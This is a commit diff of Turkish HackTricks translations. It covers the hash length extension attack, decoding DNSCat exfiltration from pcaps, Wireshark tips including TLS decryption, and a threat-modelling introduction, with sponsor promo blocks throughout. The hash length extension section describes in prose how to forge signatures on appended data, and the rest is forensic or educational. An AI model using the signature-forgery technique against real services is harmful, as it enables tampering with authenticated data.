Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi

This commit is contained in:
Translator 2024-04-18 03:38:35 +00:00
parent 3bd47589c2
commit f84f78d00d
34 changed files with 1865 additions and 1193 deletions

View file

@ -1,42 +1,55 @@
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hackleme</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> öğrenin!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR gönderin.
* **Hacking püf noktalarınızı göndererek HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) **dark-web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
# Saldırının Özeti
Bir sunucuyu hayal edin, bu sunucu **bazı verileri imzalıyor** ve bunun için bilinen açık metin verilerine bir **gizli** ekleyip bu veriyi ardından karma işlemine tabi tutuyor. Eğer şunları biliyorsanız:
Bir sunucuyu hayal edin ki **bazı verileri** **imzalıyor** ve ardından bu verilere **belli bir açık metin verisine bir sır ekleyerek** ve ardından bu veriyi karma işlemine tabi tutarak. Eğer şunları biliyorsanız:
* **Gizli bilginin uzunluğu** (bu aynı zamanda belirli bir uzunluk aralığından kaba kuvvet saldırısı ile de bulunabilir)
* **Sırrın uzunluğu** (bu aynı zamanda belirli bir uzunluk aralığından kaba kuvvet saldırısıyla da bulunabilir)
* **Açık metin verisi**
* **Algoritma (ve bu saldırıya karşı savunmasız olması)**
* **Algoritma (ve bu saldırıya karşı savunmasız)**
* **Dolgu biliniyor**
* Genellikle varsayılan bir dolgu kullanılır, bu yüzden diğer 3 gereklilik karşılanıyorsa, bu da karşılanır
* Dolgu, gizli+veri uzunluğuna bağlı olarak değişir, bu yüzden gizli bilginin uzunluğuna ihtiyaç vardır
* Genellikle varsayılan bir tane kullanılır, bu yüzden diğer 3 gereklilik karşılanıyorsa, bu da karşılanır
* Dolgu, sırrın veriye olan uzunluğuna bağlı olarak değişir, bu yüzden sırrın uzunluğuna ihtiyaç vardır
O zaman, bir **saldırganın** **veri ekleyip** ve **önceki veri + eklenen veri** için geçerli bir **imza oluşturması** mümkündür.
O zaman, bir **saldırganın** **veri ekleyebilmesi** ve **önceki veri + eklenen veri** için geçerli bir **imza oluşturabilmesi** mümkündür.
## Nasıl?
Temelde savunmasız algoritmalar, öncelikle bir **veri bloğunu karma işlemine tabi tutarak** karma değerlerini oluşturur ve ardından, **önceki** oluşturulan **karma** (durum) **veriden sonraki veri bloğunu ekler ve onu karma işlemine tabi tutar**.
Temelde savunmasız algoritmalar, öncelikle bir **veri bloğunu karma işlemine tabi tutarak** karma değerlerini oluşturur ve ardından, **önceki** oluşturulan **karma** (durum) **veriden sonraki veri bloğunu ekler ve onu karmaya tabi tutar**.
Dolayısıyla, gizli "gizli" ve veri "veri" ise, "gizliveri"nin MD5'i 6036708eba0d11f6ef52ad44e8b74d5b'dir.\
Bir saldırganın "ekle" dizesini eklemek istemesi durumunda:
Sonra, sırrın "gizli" ve verinin "veri" olduğunu hayal edin, "gizliveri"nin MD5'i 6036708eba0d11f6ef52ad44e8b74d5b'dir.\
Bir saldırgan "ekle" dizesini eklemek isterse:
* 64 "A"nın MD5'ini oluşturur
* Önceden başlatılmış karma işleminin durumunu 6036708eba0d11f6ef52ad44e8b74d5b olarak değiştirir
* Önceden başlatılmış karma durumunu 6036708eba0d11f6ef52ad44e8b74d5b yapar
* "ekle" dizesini ekler
* Karma işlemini tamamlar ve elde edilen karma, "gizli" + "veri" + "dolgu" + "ekle" için **geçerli bir imza olacaktır**
* Karmayı bitirir ve sonuçta elde edilen karma, "gizli" + "veri" + "dolgu" + "ekle" için **geçerli** bir tane olacaktır**
## **Araç**
@ -44,19 +57,30 @@ Bir saldırganın "ekle" dizesini eklemek istemesi durumunda:
## Referanslar
Bu saldırının iyi açıklandığı yeri [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) adresinde bulabilirsiniz.
Bu saldırının iyi açıklandığını bulabilirsiniz [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) **dark-web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hackleme</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> öğrenin!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR gönderin.
* **Hacking püf noktalarınızı göndererek HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>

View file

@ -1,21 +1,34 @@
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>'dan öğrenin!</strong></summary>
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
HackTricks'i desteklemenin diğer yolları:
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** isterseniz [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimizden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'da **takip edin**.
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
## WhiteIntel
Eğer **şifreleme kullanmadan DNSCat** tarafından **dışarıya sızdırılan** verileri içeren bir pcap dosyanız varsa, sızdırılan içeriği bulabilirsiniz.
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
Sadece **ilk 9 baytın** gerçek veri olmadığını, ancak **C\&C iletişimiyle ilgili olduğunu** bilmelisiniz:
[**WhiteIntel**](https://whiteintel.io) **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
Eğer **şifreleme kullanmadan DNSCat** tarafından **dışarıya sızdırılan verileri içeren** bir pcap dosyanız varsa, sızdırılan içeriği bulabilirsiniz.
Sadece **ilk 9 baytın** gerçek veri olmadığını, ancak **C\&C iletişimi** ile ilgili olduğunu bilmelisiniz:
```python
from scapy.all import rdpcap, DNSQR, DNSRR
import struct
@ -39,19 +52,19 @@ Daha fazla bilgi için: [https://github.com/jrmdev/ctf-writeups/tree/master/bsid
Python3 ile çalışan bir betik bulunmaktadır: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder)
```
```bash
python3 dnscat_decoder.py sample.pcap bad_domain
```
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi HackTricks ve HackTricks Cloud** github depolarına **PR göndererek paylaşın**.
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı takip edin.**
* **Hacking hilelerinizi paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>

View file

@ -1,26 +1,40 @@
# Wireshark hileleri
# Wireshark ipuçları
## Wireshark hileleri
## Wireshark ipuçları
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşün</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile öğrenin!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz olan [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı takip edin.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek** paylaşın.
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking ipuçlarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **tehlikeye atılıp atılmadığını** kontrol etmek için **ücretsiz** işlevler sunan bir **dark-web** destekli arama motorudur.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
## Wireshark becerilerinizi geliştirin
### Öğreticiler
### Eğitimler
Aşağıdaki öğreticiler, bazı harika temel hileler öğrenmek için mükemmeldir:
Aşağıdaki eğitimler, bazı harika temel ipuçları öğrenmek için harikadır:
* [https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/](https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/)
* [https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/](https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/)
@ -29,63 +43,63 @@ Aşağıdaki öğreticiler, bazı harika temel hileler öğrenmek için mükemme
### Analiz Edilen Bilgiler
**Uzman Bilgisi**
**Uzman Bilgiler**
_Analyze_ --> _Expert Information_ üzerine tıklayarak, **analiz edilen** paketlerde neler olduğuna dair bir **genel bakış** elde edebilirsiniz:
_Analyze_ --> **Expert Information** üzerine tıkladığınızda, **analiz edilen** paketlerde neler olduğuna dair bir **genel bakış** elde edersiniz:
![](<../../../.gitbook/assets/image (570).png>)
**Çözümlenen Adresler**
**Çözülen Adresler**
_Statistics_ --> _Resolved Addresses_ altında, wireshark tarafından "**çözümlenen**" birkaç **bilgi** bulabilirsiniz. Bu, iletişimde neyin etkilendiğini bilmek açısından ilginçtir.
_Statistics --> Çözülen Adresler_ altında, wireshark tarafından çözülen port/taşıma protokolüne, MAC'ten üreticiye vb. dair çeşitli **bilgiler** bulabilirsiniz. İletişimde neyin etkilendiğini bilmek ilginçtir.
![](<../../../.gitbook/assets/image (571).png>)
**Protokol Hiyerarşisi**
_Statistics_ --> _Protocol Hierarchy_ altında, iletişimde yer alan **protokoller** ve bunlar hakkında veriler bulabilirsiniz.
_Statistics --> Protokol Hiyerarşisi_ altında, iletişimde yer alan **protokoller** ve bunlar hakkında bilgiler bulabilirsiniz.
![](<../../../.gitbook/assets/image (572).png>)
**Konuşmalar**
_Statistics_ --> _Conversations_ altında, iletişimdeki **konuşmaların özetini** ve bunlar hakkında verileri bulabilirsiniz.
_Statistics --> Konuşmalar_ altında, iletişimdeki **konuşmaların özetini** ve bunlar hakkında bilgileri bulabilirsiniz.
![](<../../../.gitbook/assets/image (573).png>)
**Uç Noktalar**
_Statistics_ --> _Endpoints_ altında, iletişimdeki **uç noktaların özetini** ve her biri hakkında verileri bulabilirsiniz.
_Statistics --> Uç Noktalar_ altında, iletişimdeki **uç noktaların özetini** ve her biri hakkındaki bilgileri bulabilirsiniz.
![](<../../../.gitbook/assets/image (575).png>)
**DNS bilgisi**
_Statistics_ --> _DNS_ altında, yakalanan DNS istekleri hakkında istatistikler bulabilirsiniz.
_Statistics --> DNS_ altında, yakalanan DNS isteği hakkında istatistikler bulabilirsiniz.
![](<../../../.gitbook/assets/image (577).png>)
**I/O Grafik**
_Statistics_ --> _I/O Graph_ altında, iletişimin bir **grafiksel gösterimini** bulabilirsiniz.
_Statistics --> I/O Grafik_ altında, iletişimin bir **grafikini** bulabilirsiniz.
![](<../../../.gitbook/assets/image (574).png>)
### Filtreler
Burada, protokole bağlı olarak wireshark filtrelerini bulabilirsiniz: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
Burada, protokole bağlı olarak wireshark filtresi bulabilirsiniz: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
Diğer ilginç filtreler:
* `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)`
* HTTP ve başlangıç HTTPS trafiği
* HTTP ve başlangıçtaki HTTPS trafiği
* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002) and !(udp.port eq 1900)`
* HTTP ve başlangıç HTTPS trafiği + TCP SYN
* HTTP ve başlangıçtaki HTTPS trafiği + TCP SYN
* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and !(udp.port eq 1900)`
* HTTP ve başlangıç HTTPS trafiği + TCP SYN + DNS istekleri
* HTTP ve başlangıçtaki HTTPS trafiği + TCP SYN + DNS istekleri
### Arama
Oturumların paketlerindeki **içeriği aramak** isterseniz _CTRL+f_ tuşuna basın. Ana bilgi çubuğuna yeni katmanlar ekleyebilirsiniz (No., Zaman, Kaynak, vb.) sağ tıklayarak ve ardından sütun düzenleme seçeneğini seçerek.
Oturumların paketlerindeki **içerik** için **arama** yapmak istiyorsanız _CTRL+f_ tuşuna basın. Ana bilgi çubuğuna yeni katmanlar ekleyebilirsiniz (No., Zaman, Kaynak, vb.) sağ tıkladıktan sonra sütunu düzenleyerek.
### Ücretsiz pcap laboratuvarları
@ -93,11 +107,11 @@ Oturumların paketlerindeki **içeriği aramak** isterseniz _CTRL+f_ tuşuna bas
## Alanları Tanımlama
HTTP başlığı Host'u gösteren bir sütun ekleyebilirsiniz:
Host HTTP başlığını gösteren bir sütun ekleyebilirsiniz:
![](<../../../.gitbook/assets/image (403).png>)
Ve başlatan bir HTTPS bağlantısından Sunucu adını ekleyen bir sütun:
Ve başlatılan bir HTTPS bağlantısından Sunucu adını ekleyen bir sütun:
![](<../../../.gitbook/assets/image (408) (1).png>)
@ -105,7 +119,7 @@ Ve başlatan bir HTTPS bağlantısından Sunucu adını ekleyen bir sütun:
### DHCP'den
Mevcut Wireshark'ta `bootp` yerine `DHCP` aramanız gerekmektedir.
Mevcut Wireshark'ta `bootp` yerine `DHCP` aramalısınız
![](<../../../.gitbook/assets/image (404).png>)
@ -115,28 +129,27 @@ Mevcut Wireshark'ta `bootp` yerine `DHCP` aramanız gerekmektedir.
## TLS'nin Şifresini Çözme
### Sunucu özel anahtarıyla https trafiğini çözme
### Sunucu özel anahtarı ile https trafiğini çözme
_düzenle>tercih>protokol>ssl>_
_düzenle>t tercih>protokol>ssl>_
![](<../../../.gitbook/assets/image (98).png>)
_Düzenle_ düğmesine basın ve sunucu ve özel anahtarın tüm verilerini (_IP, Port, Protokol, Anahtar dosyası ve parola_) ekleyin.
_Düzenle_ düğmesine basın ve sunucunun ve özel anahtarın tüm verilerini (_IP, Port, Protokol, Anahtar dosyası ve şifre_) ekleyin
### Simetrik oturum anahtarlarıyla https trafiğini çözme
### Simetrik oturum anahtarları ile https trafiğini çözme
Firefox ve Chrome, TLS oturum anahtarlarını kaydetme yeteneğine sahiptir, bu anahtarlar Wireshark ile birlikte kullanılarak TLS trafiği çözülebilir. Bu, güvenli iletişimin detaylı analizine olanak sağlar. Bu şifrelemeyi nasıl gerçekleştireceğinizle ilgili daha fazla bilgiye [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/) rehberinde bulabilirsiniz.
Hem Firefox hem de Chrome, Wireshark'ın TLS trafiğini çözmek için kullanabileceği TLS oturum anahtarlarını kaydetme yeteneğine sahiptir. Bu, güvenli iletişimin detaylı analizine olanak tanır. Bu şifre çözümünü nasıl gerçekleştireceğinizle ilgili daha fazla ayrıntıya [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/) rehberinde bulabilirsiniz.
Bunu tespit etmek için ortam içinde `SSLKEYLOGFILE` değişkenini arayın.
Bunu tespit etmek için ortam içinde `SSLKEYLOGFILE` değişkenini arayın
Paylaşılan anahtarlar dosyası şuna benzer olacaktır:
![](<../../../.gitbook/assets/image (99).png>)
Bu dosyayı Wireshark'a içe aktarmak için \_düzenle > tercih > protokol > ssl > ve (Pre)-Master-Secret log dosya adına içe aktarın:
Bunu wireshark'a içe aktarmak için \_düzenle > tercih > protokol > ssl > ve (Ön)-Anahtar-Gizli günlük dosya adına içe aktarın:
![](<../../../.gitbook/assets/image (100).png>)
## ADB iletişimi
APK'nın gönderildiği bir ADB iletişiminden APK çıkarın:
@ -166,16 +179,28 @@ f = open('all_bytes.data', 'w+b')
f.write(all_bytes)
f.close()
```
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
WhiteIntel'in temel amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılım saldırılarıyla mücadele etmektir.
Websitesini ziyaret ederek ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>

View file

@ -1,97 +1,137 @@
# Tehdit Modelleme
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **tehlikeye atılıp atılmadığını** kontrol etmek için **ücretsiz** işlevler sunar.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
Websitesini ziyaret ederek ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
## Tehdit Modelleme
Tehdit Modellemesi hakkında HackTricks'in kapsamlı rehberine hoş geldiniz! Bu siber güvenlik alanının kritik bir yönünü keşfedin, bir sistemdeki potansiyel zayıflıkları belirleyin, anlayın ve stratejik olarak karşı koyun. Bu başlık, gerçek dünya örnekleri, yardımcı yazılımlar ve anlaşılması kolay açıklamalarla dolu adım adım bir rehber olarak hizmet verir. Hem acemiler hem de siber güvenlik savunmalarını güçlendirmek isteyen deneyimli uygulayıcılar için idealdir.
Tehdit Modelleme konusunda HackTricks'in kapsamlı kılavuzuna hoş geldiniz! Bu kritik siber güvenlik yönünü keşfetmeye başlayın, burada bir sistemdeki potansiyel zayıflıkları tanımlayarak, anlayarak ve stratejik bir şekilde karşı önlemler alarak savaşırız. Bu konu, gerçek dünya örnekleri, yardımcı yazılımlar ve anlaşılması kolay açıklamalarla dolu adım adım bir rehber olarak hizmet verir. Hem acemiler hem de siber güvenlik savunmalarını güçlendirmek isteyen deneyimli uygulayıcılar için idealdir.
### Sık Kullanılan Senaryolar
### Sıkça Kullanılan Senaryolar
